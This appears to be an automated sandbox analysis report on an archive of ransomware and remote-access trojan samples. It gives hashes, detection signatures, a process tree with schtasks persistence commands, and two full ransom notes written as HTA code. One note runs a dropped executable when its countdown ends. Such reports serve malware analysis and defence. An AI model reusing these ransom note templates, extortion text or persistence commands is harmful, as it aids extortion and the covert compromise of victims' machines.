Resubmissions

12-06-2024 08:28

240612-kcy2jawckj 10

10-06-2024 17:27

240610-v1ktxsvbpk 10

Analysis

  • max time kernel
    274s
  • max time network
    600s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-06-2024 08:28

General

  • Target

    Mydooms.zip

  • Size

    7.3MB

  • MD5

    d9bbe9314e8114fa2cc00422b09fdd9d

  • SHA1

    a138d7a8c054d8dd9904f6fb378d51af02385a52

  • SHA256

    dbcc1bec2dbc4002cfdade40966eb639ccf4da67a7b9728f444beb1d35ed4f7f

  • SHA512

    79c96afd2bedb2ed22027cd135678db411fedeba92e481d2e410eb516cb26d8c8aebf3d63ed8941a91f70dee75a5fa2dfdff8c2bec07c205ac33710f2dff635f

  • SSDEEP

    196608:RyiXnVyuWadlIK+eU3hW0y9PnO+K8Lsi2L:AiXnVyuWaP6eahWPNPt2L

Malware Config

Extracted

Family

zebrocy

C2

Windows XP Professional x64 Edition

Extracted

Path

C:\ProgramData\Adobe\# SATAN CRYPTOR #.hta

Ransom Note
<html> <head> <title>SATAN CRYPTOR</title> <HTA:APPLICATION ID="" APPLICATIONNAME="" BORDER="DIALOG" MAXIMIZEBUTTON="NO" SCROLLFLAT="YES" CAPTION="YES" SELECTION="NO" INNERBORDER="NO" ICON="" SCROLL="NO" SHOWINTASKBAR="YES" SINGLEINSTANCE="YES" SYSMENU="YES" WINDOWSTATE="NORMAL" /> </head> <script language=javascript> var winWidth = 800; var winHeight = 600; window.resizeTo(winWidth, winHeight); window.moveTo(screen.width/2-winWidth/2, screen.height/2-winHeight/2); </script> <body bgcolor=buttonface text=buttontext style="font: 10pt 'Tahoma'"> <div style="font-weight:bold; font:16pt; text-align: center" id="Tittle">Attention!</div> <br> <div style="padding:15px" id="SubTittle"> Your documents, photos, databases and other important files have been encrypted cryptographically strong, without the cipher key recovery is impossible! <br> <br> To decrypt your files you need to buy the special software - <strong>SATAN DECRYPTOR</strong> and your <strong>Private Decryption Key</strong>. <br> <br> Using another tools could corrupt your files, in case of using third party software we dont give guarantees that full recovery is possible so use it on your own risk. <br> <br> If you want to restore files, write us to the our e-mail: <strong>[email protected]</strong> <br> <br> Please write your <strong>Personal Identification Code</strong> in body of your message. <br> <br> Also attach to email 3 encrypted files for free decryption test. (each file have to be less than 1 MB size and not have valuable content) <br> <br> It is in your interest to respond as soon as possible to ensure the restoration of your files! <br> <br> Your <strong>Personal Identification Code</strong>: </div> <center> <textarea style="overflow:auto; font:10pt 'Tahoma'" name="TextArea" rows=10 cols=120 readonly>5354000000019B0400000FE0B12B2A0B09B7C71EF78A881641194249A3014C09724727D476421F72BFE3DB1D0FD134D7D01D5736B4AC385B278C4ABAFD08BD4816DB0FC3AC7D9152555AC7F88DA092311E13A978F29BB4532D362E1844F9FFC9DBBEA294F0FDA47B986CF424D745A99E389B0EBA691CD6603683171A144272071A2B3C0BA0D3DB7B89A55502EC94B8540DD4A16DBE4C56E92E0BE742A2328F9D1D4630DC4E650C5426794DEEC7EC17A7C986864B230F868B9F26CA41E3703517FEB18CBA347AD60EB9D3F0A100BA9FBF2C52455DC6A0E2A0C4220752427D349B4E3D7F311C1ACFFA6F9346D1F553742837CF0CD1623AC35AD21049A91A3A39D19A0F10D73DD9D2FE65D891F5FD180DC0A3D7334D63D3789F070BA038A7B664898585E573C0ECCAB275A8412088F4FCD9E89A6C42B93E714445629861FAA5372D0092FD2939A1C76DD8A26E3F19B20522716A5DF5D8BC537747A4D438334B6D414A831C2503C57625177E65B47A0ACB312D551B76D46E8EBB189097437F67E357CC24D7D0310B046BDD3DBDF4A969D5F81CF3D98BFDD59B2E55BC61B9CA06D8BC1254AB1B8EE0F8F9585DE1A69C3646B17BA28A96BB31AFF282EB38A0AE97736539B2CCFF19EA061F89FA56859DBA67F2574639EEC8298F6C6CA9DD21F12E2AE6EB1BCF4AEE123211811D5B141D994571E8C5068F1F21DC1A4C11A830F7377661EB33B82B778592374A524F007B24057DE14E224910F27B8BF065C6E5061DAD95B9406730F06AC7721178C013D5F170A034D26F4F6FD4C77801B212682164A0AF2C851536ACD3530B820646DFB0103A1196305B3AA536445B7C22401CA580F3283A83C501D6D9B874721BDA1CCEF8F2B8D10D44ADCD469B7F5F494291B5BFAEFC607266BAD015D646C16F2C99D1D086A42B53831E49C90B08974630E1E4CDF351A0DBBEFCBACC106660BEB76C3F19B61F6E0F14B6E75EA00B03CD8286C0CA85F3736D0653EEB2BFFAD13D4374647F27ADA6AA4695439D320A489B48D5E280EE3A7E60CAFA21CDE008EF5E40EA0F3A16602C01CB688913260B1DD99E0C2A2286D2EC26AAE883EC76529FCC34AE75F21D58A578C61ACEF70911918CC80DDB52713E723C636468C83F544D524D2DE994436BD3C070A3EF0E6D65E1DDB0AB85558B1800F38E5774FF65BE1D74831AE56A1F0CADB6D1CFA732E831A64A0827FAE648AF2DEFC37E9F832514B0294281991E464992DAF8C3A7AAC64AF88BB30A3AAF9D7C3EFD81D506840998EEC284239C428E4695B1EFF1C7399124904841A9E4E1FE72BEB0FFECAA22A96ACE1B6AADEBE2D31D15B7BC302BBE2F901E1B3C7ACAA4FF14DA9790C1D8305C1DE6FF30CB966011F89E5BC784EA992B7BF52F68F8ABAC6BDF9EAAB4FFA6C47EFA0B2496AE50E52DFC08FD554811C28EBC1349D7FD1C21B185624BAF69F6CFF25B778417B5C6D01427A709867633690D406810BAEDA307C3054193D410AB25CD0ED6C4D0E35EC28F324E6077E0A1970B2E2EE648C9BC864B084A4BA6E4629ADD9C448C3426E8CDAEE2B0716A7C7811476C2FA4E22C92221E20BA4BDB2EC85E007F2600E3288F63D036422799F91C9C5FE0C5BD407C6B0635252CF596EED208D1F10356E358E2FA74667A80B3A43EF7CBDB5235AE5135CA4EF23D88A16C006C7F9F3FAC23297DAD040000</textarea> </center> </body>
Emails

<strong>[email protected]</strong>

Extracted

Path

C:\Users\Admin\Desktop\New folder\Mydoom\Mydoom Ransomwares\info.hta

Ransom Note
<html> <head> <title>Loki locker</title> <HTA:APPLICATION ICON='msiexec.exe' WINDOWSTATE="maximize" SINGLEINSTANCE='yes' SysMenu="no" contextmenu="no" scroll="yes"/> <meta http-equiv="x-ua-compatible" content="IE=9"/> </head> <style type="text/css"> body{background-color: #000000; font-family: Arial, Helvetica, sans-serif;}#t{text-align: center; color: #FF0000; font-weight: bold; font-size: 1.51vw; margin-bottom: 0;}p{text-align: center; font-size: 1vw; color: white; margin-bottom: 0;}.t{text-align: left; margin-left: 2px;}.pt{color: white; font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; font-size: 1.1vw;}.b{padding: 2px; outline: none;}ul{font-size: 1vw;}.m{background: rgb(189, 54, 54); padding: 1px 5px; font-weight: bold;}#tm{color: red; text-align: center; border-bottom: 0; font-size: 2vw;}</style> <script>var countDownDate = new Date(2024,6,12,8,30,43).getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("tm").innerHTML = days + "d," + hours + ":" + minutes + ":" + seconds + " LEFT TO LOSE ALL OF YOUR FILES"; if (distance < 0) { clearInterval(x); document.getElementById("tm").innerHTML = "TIMER IS UP.SAY BYE TO YOUR FILES :)"; WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("C:\\ProgramData\\winlogon.exe", 1, false);}}, 1000); </script> <body > <h1 id="t">All your files have been encrypted by Loki locker!</h1> <h2 id="tm"></h2> <p>All your files have been encrypted due to a security problem with your PC. <br>If you want to restore them, please send an email <span class="m">[email protected]</span> </p><br><p class="t"> You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. <br>After payment we will send you the decryption tool. <br>You have to 48 hours(2 Days) To contact or paying us After that, you have to Pay <b>Double</b>. <br>In case of no answer in 24 hours (1 Day) write to this email <span class="m">[email protected]</span> <br>Your unique ID is : <span class="m">DE44B1C0</span> </p><br><div class="b" style="background-color: #FF0000;"> <div class="pt">You only have LIMITED time to get back your files!</div><ul style="color: white; margin-top: 0;"> <li>If timer runs out and you dont pay us , all of files will be DELETED and you hard disk will be seriously DAMAGED.</li><li>You will lose some of your data on day 2 in the timer.</li><li>You can buy more time for pay. Just email us.</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :) </li></ul> </div><br><div class="b" style="background-color: rgb(78, 78, 78);"> <div class="pt">What is our decryption guarantee?</div><ul style="color: white; margin-top: 0;"> <li>Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></div><br><div class="b" style="background-color: #FF0000;"> <div class="pt">Attention!</div><ul style="color: white; margin-top: 0;"> <li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li><li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li></ul> </div></body> </html>
Emails

class="m">[email protected]</span>

class="m">[email protected]</span>

URLs

http-equiv="x-ua-compatible"

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • SatanCryptor

    Golang ransomware first seen in early 2020.

  • Zebrocy

    Zebrocy is a backdoor created by Sofacy threat group and has multiple variants developed in different languages.

  • Zebrocy Go Variant 2 IoCs
  • DCRat payload 1 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (262) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (282) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (519) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 6 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • ACProtect 1.3x - 1.4x DLL software 1 IoCs

    Detects file using ACProtect software.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 15 IoCs
  • Executes dropped EXE 39 IoCs
  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 21 IoCs
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 20 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Maps connected drives based on registry 3 TTPs 9 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 64 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 16 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 64 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies registry class 15 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • NTFS ADS 64 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious behavior: RenamesItself 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Mydooms.zip
    1⤵
      PID:1804
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1720
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\New folder\" -an -ai#7zMap2010:94:7zEvent10219
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1000
      • C:\Users\Admin\Desktop\New folder\Mydoom\00b9b6cf27deeda8de99d1719ef724808afa92080026df8dd17159be8ea420f7.exe
        "C:\Users\Admin\Desktop\New folder\Mydoom\00b9b6cf27deeda8de99d1719ef724808afa92080026df8dd17159be8ea420f7.exe"
        1⤵
        • Executes dropped EXE
        PID:2728
      • C:\Users\Admin\Desktop\New folder\Mydoom\0b75e2fadffc45dff940e58f5b6f8d99832426bb880f432f98d853308b29c9c5.exe
        "C:\Users\Admin\Desktop\New folder\Mydoom\0b75e2fadffc45dff940e58f5b6f8d99832426bb880f432f98d853308b29c9c5.exe"
        1⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        PID:4344
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 8364
          2⤵
          • Program crash
          PID:5164
      • C:\Users\Admin\Desktop\New folder\Mydoom\0d5fa75218e5eb97fccbcf36d3bbd9cd77247260977f69c50deb29399ee0e464.exe
        "C:\Users\Admin\Desktop\New folder\Mydoom\0d5fa75218e5eb97fccbcf36d3bbd9cd77247260977f69c50deb29399ee0e464.exe"
        1⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3260
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout 1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3276
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:1208
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout 1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3212
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:2116
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout 1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4740
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            3⤵
            • Delays execution with timeout.exe
            PID:2808
        • C:\Users\Admin\Desktop\New folder\Mydoom\0d5fa75218e5eb97fccbcf36d3bbd9cd77247260977f69c50deb29399ee0e464.exe
          "C:\Users\Admin\Desktop\New folder\Mydoom\0d5fa75218e5eb97fccbcf36d3bbd9cd77247260977f69c50deb29399ee0e464.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          PID:5848
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:8184
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "msedge" /sc ONLOGON /tr "'C:\Documents and Settings\msedge.exe'" /rl HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:7440
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\Downloads\conhost.exe'" /rl HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:9848
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:6420
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:9092
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\Idle.exe'" /rl HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:13352
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\Office16\PROOF\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe'" /rl HIGHEST /f
            3⤵
            • Creates scheduled task(s)
            PID:14208
          • C:\Program Files\Microsoft Office\root\Office16\PROOF\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe
            "C:\Program Files\Microsoft Office\root\Office16\PROOF\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            PID:10596
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c timeout 1
              4⤵
                PID:14036
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 1
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4052
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c timeout 1
                4⤵
                  PID:12172
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 1
                    5⤵
                    • Delays execution with timeout.exe
                    PID:13796
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout 1
                  4⤵
                    PID:4772
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 1
                      5⤵
                      • Delays execution with timeout.exe
                      PID:12540
                  • C:\Program Files\Microsoft Office\root\Office16\PROOF\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe
                    "C:\Program Files\Microsoft Office\root\Office16\PROOF\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:12232
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 10596 -s 1596
                    4⤵
                    • Program crash
                    PID:9456
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 1540
                2⤵
                • Program crash
                PID:5896
            • C:\Users\Admin\Desktop\New folder\Mydoom\3d9f9c162e130c197301adb5a4e141f2e1ae8a19c85b457c429e8410a5c91464.exe
              "C:\Users\Admin\Desktop\New folder\Mydoom\3d9f9c162e130c197301adb5a4e141f2e1ae8a19c85b457c429e8410a5c91464.exe"
              1⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Adds Run key to start application
              • Maps connected drives based on registry
              • Drops file in System32 directory
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:2428
              • C:\Windows\SysWOW64\ctfmen.exe
                ctfmen.exe
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:888
                • C:\Windows\SysWOW64\smnss.exe
                  C:\Windows\system32\smnss.exe
                  3⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Adds Run key to start application
                  • Enumerates connected drives
                  • Maps connected drives based on registry
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4252
                  • C:\Windows\SysWOW64\smnss.exe
                    C:\Windows\system32\smnss.exe
                    4⤵
                      PID:12828
              • C:\Users\Admin\Desktop\New folder\Mydoom\3d9f9c162e130c197301adb5a4e141f2e1ae8a19c85b457c429e8410a5c91464.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\3d9f9c162e130c197301adb5a4e141f2e1ae8a19c85b457c429e8410a5c91464.exe"
                1⤵
                • Executes dropped EXE
                • Maps connected drives based on registry
                • Drops file in System32 directory
                • Modifies registry class
                PID:4120
              • C:\Users\Admin\Desktop\New folder\Mydoom\1fe99fb7c527a90826896e695f23e712375358df3c7aa9163af6b96d872a9f81.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\1fe99fb7c527a90826896e695f23e712375358df3c7aa9163af6b96d872a9f81.exe"
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                PID:4280
              • C:\Users\Admin\Desktop\New folder\Mydoom\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\2af6bc16f25822d6d2f1429bc15f3d47f6c0bcb026ba387249d173fc753919b2.exe"
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Windows directory
                PID:3592
              • C:\Users\Admin\Desktop\New folder\Mydoom\4d61a61265cdd942cff973609170529eaf19579b5d17e64deccbd6f6f1fdfa08.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\4d61a61265cdd942cff973609170529eaf19579b5d17e64deccbd6f6f1fdfa08.exe"
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Windows directory
                • Suspicious use of WriteProcessMemory
                PID:3500
                • C:\Windows\services.exe
                  "C:\Windows\services.exe"
                  2⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2892
              • C:\Users\Admin\Desktop\New folder\Mydoom\6c3c9af653a28977257ce971ed701b1b893cdf67d5c57baa44a9d76c28675dc3.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\6c3c9af653a28977257ce971ed701b1b893cdf67d5c57baa44a9d76c28675dc3.exe" "C:\Users\Admin\Desktop\New folder\Mydoom\4d61a61265cdd942cff973609170529eaf19579b5d17e64deccbd6f6f1fdfa08.exe"
                1⤵
                • Executes dropped EXE
                PID:1712
              • C:\Users\Admin\Desktop\New folder\Mydoom\6c3c9af653a28977257ce971ed701b1b893cdf67d5c57baa44a9d76c28675dc3.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\6c3c9af653a28977257ce971ed701b1b893cdf67d5c57baa44a9d76c28675dc3.exe"
                1⤵
                • Executes dropped EXE
                PID:1568
              • C:\Users\Admin\Desktop\New folder\Mydoom\6c37d14d5ad674e4c0fa8df0a999be6b27399936c9ff16f7fb30b802addb7b4c.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\6c37d14d5ad674e4c0fa8df0a999be6b27399936c9ff16f7fb30b802addb7b4c.exe"
                1⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:1576
                • C:\Users\Admin\AppData\Local\Temp\services.exe
                  "C:\Users\Admin\AppData\Local\Temp\services.exe"
                  2⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2604
              • C:\Users\Admin\Desktop\New folder\Mydoom\7bca70a81cc9e1067e99e313802a4cc095f79bbc3a1aa86b7b3b9eabf3748e61.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\7bca70a81cc9e1067e99e313802a4cc095f79bbc3a1aa86b7b3b9eabf3748e61.exe"
                1⤵
                • Executes dropped EXE
                PID:3568
              • C:\Users\Admin\Desktop\New folder\Mydoom\8e934dcd46eb57d42712d097deab6ce00ef1ce2db87d03f8d3d8e8c10da7e088.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\8e934dcd46eb57d42712d097deab6ce00ef1ce2db87d03f8d3d8e8c10da7e088.exe"
                1⤵
                • Executes dropped EXE
                PID:220
              • C:\Users\Admin\Desktop\New folder\Mydoom\9a75c8e353df060ec927ada5990402b57764275f2a860d9cf500a661ec3de060.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\9a75c8e353df060ec927ada5990402b57764275f2a860d9cf500a661ec3de060.exe"
                1⤵
                • Executes dropped EXE
                PID:2072
              • C:\Users\Admin\Desktop\New folder\Mydoom\1760c5727e5568d3b18a1cbf0d50c311613699af8233c96fb3eee197f438ce9c.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\1760c5727e5568d3b18a1cbf0d50c311613699af8233c96fb3eee197f438ce9c.exe"
                1⤵
                • Executes dropped EXE
                PID:4048
              • C:\Users\Admin\Desktop\New folder\Mydoom\5642f8bd3bc151349ded1a3c160c037c26194c9da2b7ace5d8ca11cddb57612a.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\5642f8bd3bc151349ded1a3c160c037c26194c9da2b7ace5d8ca11cddb57612a.exe"
                1⤵
                • Executes dropped EXE
                PID:1568
              • C:\Users\Admin\Desktop\New folder\Mydoom\e16d377c12b63acb694601b4bde36d61839054409e7fae1661fb051892d2ed36.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\e16d377c12b63acb694601b4bde36d61839054409e7fae1661fb051892d2ed36.exe"
                1⤵
                • Executes dropped EXE
                PID:4080
              • C:\Users\Admin\Desktop\New folder\Mydoom\e302f733d4a31342a0c908055a6e59b3fd8f1ed3ce98750d00251e4f0efe6c02.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\e302f733d4a31342a0c908055a6e59b3fd8f1ed3ce98750d00251e4f0efe6c02.exe"
                1⤵
                • Executes dropped EXE
                PID:4756
              • C:\Users\Admin\Desktop\New folder\Mydoom\fe3b2cf08a6224a04194a6555b4593b0a7428cb1fe057c08776d09568fc58cd5.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\fe3b2cf08a6224a04194a6555b4593b0a7428cb1fe057c08776d09568fc58cd5.exe"
                1⤵
                • Executes dropped EXE
                PID:3768
              • C:\Users\Admin\Desktop\New folder\Mydoom\23361735678f37d77510b22306c727a987f84c87143bb0062f3d76413c36fc98.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\23361735678f37d77510b22306c727a987f84c87143bb0062f3d76413c36fc98.exe"
                1⤵
                • Executes dropped EXE
                PID:4808
              • C:\Users\Admin\Desktop\New folder\Mydoom\a9a89ed0d139fbc436794f5d3a8e58c547247039d8c86767b1e2f2bce40e390f.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\a9a89ed0d139fbc436794f5d3a8e58c547247039d8c86767b1e2f2bce40e390f.exe"
                1⤵
                • Executes dropped EXE
                PID:2428
              • C:\Users\Admin\Desktop\New folder\Mydoom\b4ab8f5c8b97307b328ba30fdefdbe4341c4e2c576729fdb5c7329d5b07bb695.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\b4ab8f5c8b97307b328ba30fdefdbe4341c4e2c576729fdb5c7329d5b07bb695.exe"
                1⤵
                • Executes dropped EXE
                PID:3796
              • C:\Users\Admin\Desktop\New folder\Mydoom\c45a330cf80c33977658649596d4867301e928381c5fc37ec3edabfad2251324.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\c45a330cf80c33977658649596d4867301e928381c5fc37ec3edabfad2251324.exe"
                1⤵
                • Executes dropped EXE
                PID:2072
              • C:\Users\Admin\Desktop\New folder\Mydoom\c03431309015563257e5e118656d07ce136f151339054b9f66894ecf9dde9aef.exe
                "C:\Users\Admin\Desktop\New folder\Mydoom\c03431309015563257e5e118656d07ce136f151339054b9f66894ecf9dde9aef.exe"
                1⤵
                • Sets DLL path for service in the registry
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
